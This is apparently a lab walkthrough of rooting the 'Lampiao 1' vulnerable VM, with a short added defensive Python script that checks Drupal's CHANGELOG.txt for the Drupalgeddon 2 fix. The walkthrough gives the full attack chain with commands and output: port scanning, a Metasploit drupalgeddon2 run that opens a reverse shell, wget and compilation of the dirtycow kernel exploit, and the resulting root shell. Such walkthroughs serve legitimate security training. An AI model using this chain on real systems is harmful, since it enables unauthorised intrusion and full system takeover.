Target VM: Lampiao 1 Penetration Test

Objective

Would you like to keep hacking in your own lab?

Try this brand new vulnerable machine! “Lampião 1”.

Get root!

Level: Easy

Information Gathering

Once the VM is running, use arp-scan to find its IP address.

$ sudo arp-scan --interface=vmnet8 -l
Interface: vmnet8, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
172.16.214.128    00:0c:29:86:aa:2e    VMware, Inc.
172.16.214.254    00:50:56:ef:25:24    VMware, Inc.

That gives us the target IP: 172.16.214.128. Opening it in a browser shows an image made of special characters, nothing of real use.

Let's scan the ports with nmap:

$ nmap -vv -sV -Pn -p- --open 172.16.214.128 --reason -T4
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-20 22:13 CST
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 22:13
Completed Parallel DNS resolution of 1 host. at 22:13, 13.01s elapsed
Initiating Connect Scan at 22:13
Scanning 172.16.214.128 [65535 ports]
Discovered open port 22/tcp on 172.16.214.128
Discovered open port 80/tcp on 172.16.214.128
Discovered open port 1898/tcp on 172.16.214.128
Completed Connect Scan at 22:15, 89.86s elapsed (65535 total ports)
Initiating Service scan at 22:15
Scanning 3 services on 172.16.214.128
Completed Service scan at 22:16, 59.87s elapsed (3 services on 1 host)
NSE: Script scanning 172.16.214.128.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 6.10s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 22:16
Completed NSE at 22:16, 1.01s elapsed
Nmap scan report for 172.16.214.128
Host is up, received user-set (0.0030s latency).
Scanned at 2018-10-20 22:13:37 CST for 157s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http?   syn-ack
1898/tcp open  http    syn-ack Apache httpd 2.4.7 ((Ubuntu))

The scan shows port 1898 serving Apache. Visiting it, we find a blog site whose footer reads "Powered by Drupal".

Checking the page source, the head contains <meta name="Generator" content="Drupal 7 (http://drupal.org)" />, which further confirms that the site is running Drupal 7.

Getting a Server Shell

First I tried searching exploit-database for usable Drupal 7 exploits, but that got me nowhere.

Next I tried the attack modules in msf:

msf > search Drupal
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                           Disclosure Date  Rank       Description
   ----                                           ---------------  ----       -----------
   auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Drupal OpenID External Entity Injection
   auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Drupal Views Module Users Enumeration
   exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  Drupal HTTP Parameter Key/Value SQL Injection
   exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Drupal CODER Module Remote Command Execution
   exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Drupal Drupalgeddon 2 Forms API Property Injection
   exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Drupal RESTWS Module Remote PHP Code Execution
   exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution

This was interesting: I first tried the drupal_drupageddon, drupal_coder_exec and drupal_restws_exec modules, and none of them worked.

Finally I tried drupal_drupalgeddon2, and holy crap, it worked!!!

msf > use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 1898
RPORT => 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 172.16.214.128
rhost => 172.16.214.128
msf exploit(unix/webapp/drupal_drupalgeddon2) > run

[*] Started reverse TCP handler on 172.16.214.1:4444
[*] Drupal 7 targeted at http://172.16.214.128:1898/
[+] Drupal appears unpatched in CHANGELOG.txt
[*] Sending stage (37775 bytes) to 172.16.214.128
[*] Meterpreter session 1 opened (172.16.214.1:4444 -> 172.16.214.128:54264) at 2018-10-20 23:13:12 +0800
meterpreter >
meterpreter > ls
Listing: /var/www/html
======================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100755/rwxr-xr-x  110781   fil   2018-04-20 03:57:14 +0800  CHANGELOG.txt
100755/rwxr-xr-x  1481     fil   2018-04-20 03:57:14 +0800  COPYRIGHT.txt
100755/rwxr-xr-x  1717     fil   2018-04-20 03:57:14 +0800  INSTALL.mysql.txt
100755/rwxr-xr-x  1874     fil   2018-04-20 03:57:14 +0800  INSTALL.pgsql.txt
......
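The "Drupal appears unpatched in CHANGELOG.txt" line in the module output comes from reading the release version at the top of that world-readable file. The following is an added defender-side example, not code from the original writeup or from Metasploit: it performs the same check so an administrator can verify their own install. The fixed release, 7.58 (SA-CORE-2018-002), is a known fact; the sample changelog text is constructed.

```python
import re
import sys
from typing import Optional, Tuple

# Drupalgeddon 2 (SA-CORE-2018-002) was fixed in Drupal 7.58;
# any 7.x release older than this at the top of CHANGELOG.txt is exposed.
FIXED_VERSION = (7, 58)

# Constructed sample: the head of a Drupal 7 CHANGELOG.txt as core ships it.
# Newest release first, one "Drupal X.Y, YYYY-MM-DD" line per release.
SAMPLE_CHANGELOG = """\
Drupal 7.57, 2018-02-21
-----------------------
- Fixed security issues (multiple vulnerabilities). See SA-CORE-2018-001.

Drupal 7.56, 2017-06-21
-----------------------
- Fixed security issues (access bypass). See SA-CORE-2017-003.
"""

_RELEASE_RE = re.compile(r"^Drupal (\d+)\.(\d+)\S*,", re.MULTILINE)


def parse_version(changelog: str) -> Optional[Tuple[int, int]]:
    """Return (major, minor) of the newest release in CHANGELOG.txt, or None."""
    m = _RELEASE_RE.search(changelog)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def is_unpatched(changelog: str) -> Optional[bool]:
    """True if the file shows a Drupal 7 release older than 7.58.

    Returns None when the version is missing or not 7.x, so that
    "unknown" is never reported as "patched".
    """
    version = parse_version(changelog)
    if version is None or version[0] != 7:
        return None
    return version < FIXED_VERSION


if __name__ == "__main__":
    # Usage: python check_drupal.py /var/www/html/CHANGELOG.txt
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_CHANGELOG
    verdict = {True: "UNPATCHED", False: "patched", None: "unknown"}[is_unpatched(text)]
    print(f"version={parse_version(text)} status={verdict}")
```

CHANGELOG.txt can be stale or deleted on a manually patched site, so cross-check against the VERSION constant in includes/bootstrap.inc; the file being readable from the web is also exactly what let the module fingerprint the site, so removing it from the document root is a cheap hardening step.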

What we have obtained at this point is a meterpreter. Meterpreter is an extension module of the Metasploit framework, used as the payload after a successful exploit; once the exploit succeeds, the payload hands us back a control channel.

First run the meterpreter command getuid to check the current privileges:

meterpreter > getuid
Server username: www-data (33)

As you can see, we are currently www-data, which does not meet our goal, so we need to escalate privileges.

Privilege Escalation

First confirm the kernel version with the sysinfo command:

meterpreter > sysinfo
Computer    : lampiao
OS          : Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686
Meterpreter : php/linux

Good, 4.4.0-31-generic. Now run the shell command to get an interactive shell.

meterpreter > shell
Process 14863 created.
Channel 2 created.

Note that the shell obtained here is not a fully interactive one, which causes problems after running a privilege-escalation script: for example, the script reports success but then prints an unknown error, and running id still shows the original privileges. You can spawn a proper one with Python: python -c 'import pty; pty.spawn("/bin/bash")', or refer to this article.

Use searchsploit to look for privilege-escalation exploits:

$ ./searchsploit Ubuntu 4.4
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                                                                                                    |  Path
                                                                                                                                                                  | (/opt/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privilege Escalation (Metasploit)                                                                                   | exploits/linux/local/40759.rb
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation                                                                  | exploits/linux_x86-64/local/40871
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free (PoC)                                                                                                              | exploits/linux/dos/41457.c
Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation                                                                                               | exploits/linux/local/41458.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation                                                             | exploits/linux_x86-64/local/40049
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation                                                                      | exploits/linux/local/39772.txt
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation                                                                                            | exploits/linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation                                                                 | exploits/linux/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16.04) - Local Privilege Escalation (KASLR / SMEP)                                                             | exploits/linux/local/43418.c
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------
Shellcodes: No Result

OK, I choose you: Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation

$ gcc 44298.c
44298.c:17:23: fatal error: linux/bpf.h: No such file or directory
 #include <linux/bpf.h>
                       ^
compilation terminated.

Well, the target server is missing the kernel headers, so let's use a detection script to see which exploits might work.

Trying them one by one, only a single exploit worked (dirtycow 2); the others either failed to compile or crashed the box when run.

[+] [CVE-2016-5195] dirtycow 2

   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847.cpp
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh

First go to https://www.exploit-db.com/exploits/40847/ to see how the script is compiled and run.

www-data@lampiao:/$ cd /tmp
www-data@lampiao:/tmp$ wget https://www.exploit-db.com/download/40847.cpp
www-data@lampiao:/tmp$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
www-data@lampiao:/tmp$ ./dcow -s
./dcow -s
Running ...
Password overridden to: dirtyCowFun

Received su prompt (Password: )

echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@lampiao:~#
root@lampiao:~# ls
flag.txt

OK, we now have root; next read flag.txt.

root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366